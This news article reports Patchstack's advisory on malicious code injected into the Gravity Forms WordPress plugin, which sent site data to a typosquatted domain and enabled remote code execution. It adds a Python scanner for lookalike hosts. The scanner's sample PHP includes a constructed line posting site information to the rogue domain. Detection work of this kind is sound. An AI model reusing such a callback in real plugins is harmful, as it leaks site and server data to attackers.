WordPress security company Patchstack published an advisory about a serious vulnerability in Gravity Forms caused by a supply chain attack. Gravity Forms responded immediately and released an update to fix the issue.
Supply Chain Attack
Patchstack has been monitoring an attack on a WordPress plugin in which the attackers uploaded an infected version of the plugin directly to the publisher’s repository; the infected plugin then fetched other files from a domain name similar to the official one. This, in turn, led to a serious compromise of websites that used the plugin.
A similar attack was observed in Gravity Forms and was immediately addressed by the publisher. The attackers had injected malicious code into Gravity Forms (specifically into gravityforms/common.php). The code caused the plugin, once installed, to make HTTP POST requests to the rogue domain gravityapi.org, which had been registered just days before the attack and was controlled by the attackers.
The compromised plugin sent detailed site and server information to the attacker’s server and enabled remote code execution on the infected sites. In the context of a WordPress plugin, a remote code execution (RCE) vulnerability occurs when an attacker can run malicious code on a targeted website from a remote location.
Patchstack explained the extent of the vulnerability:
“…it can perform multiple processes:
- Upload an arbitrary file to the server.
- List all of the user accounts on the WordPress site (ID, username, email, display name).
- Delete any user accounts on the WordPress site.
- Perform arbitrary file and directory listings on the WordPress server.”
That last capability means the attacker can view any file, regardless of permissions, including the wp-config.php file, which contains the database credentials.
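The injected code described above gave itself away by contacting a host that merely resembled the vendor's. As an added illustration (not code from the article or from Gravity Forms), the following scan extracts every hostname referenced in a plugin's PHP source and reports those outside a trusted allowlist, together with how closely each resembles a trusted domain. The sample PHP is constructed, and the allowlist of vendor hosts is an assumption; a real one would come from the vendor's documentation.

```python
import re
from difflib import SequenceMatcher

# Constructed stand-in for a plugin source file: NOT the real injected code.
# It mixes a legitimate vendor URL with a host modelled on the rogue domain
# named in the advisory.
SAMPLE_PHP = """<?php
$docs = 'https://www.gravityforms.com/documentation/';
$resp = wp_remote_post('https://gravityapi.org/collect', array('body' => $site_info));
"""

# Assumption: the vendor's legitimate hosts. Only gravityforms.com is named
# on the page; an operational allowlist must come from the vendor itself.
TRUSTED_HOSTS = {"gravityforms.com", "www.gravityforms.com"}

HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def registrable(host: str) -> str:
    """Crude registrable name: the last two labels (adequate for .com/.org vendors)."""
    return ".".join(host.lower().split(".")[-2:])


def lookalike_score(host: str, trusted=TRUSTED_HOSTS) -> float:
    """Similarity (0..1) between the host's registrable name and the closest trusted one."""
    name = registrable(host)
    return max(SequenceMatcher(None, name, registrable(t)).ratio() for t in trusted)


def scan_source(src: str, trusted=TRUSTED_HOSTS):
    """Return (host, score) for every referenced host that is not on the allowlist.

    Any untrusted host in a vendor plugin deserves review; a high score means
    the domain resembles the vendor's own, the typosquat pattern in the advisory.
    """
    findings = []
    for host in sorted({h.lower() for h in HOST_RE.findall(src)}):
        if host in trusted or registrable(host) in trusted:
            continue
        findings.append((host, round(lookalike_score(host, trusted), 2)))
    return findings


if __name__ == "__main__":
    for host, score in scan_source(SAMPLE_PHP):
        flag = "LOOKALIKE" if score >= 0.5 else "unknown host"
        print(f"{host:30s} similarity={score:.2f} {flag}")
```

Run over a plugin directory, this is a cheap pre-update check for callbacks to hosts the vendor never used; the similarity score only prioritises, so every untrusted host still warrants a look.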
Gravity Forms Responds
RocketGenius, the publisher of Gravity Forms, took immediate action and uploaded a fixed version of the plugin the same day. The domain registrar, Namecheap, suspended the rogue typosquatted domain, which effectively blocked compromised websites from contacting the attackers.
Gravity Forms has released an updated version of the plugin, 2.9.13. Users should consider updating to the latest version.
Read more at Patchstack:
Malware Found in Official Gravity Forms Plugin Indicating Supply Chain Breach
Featured Image by Shutterstock/Warm_Tail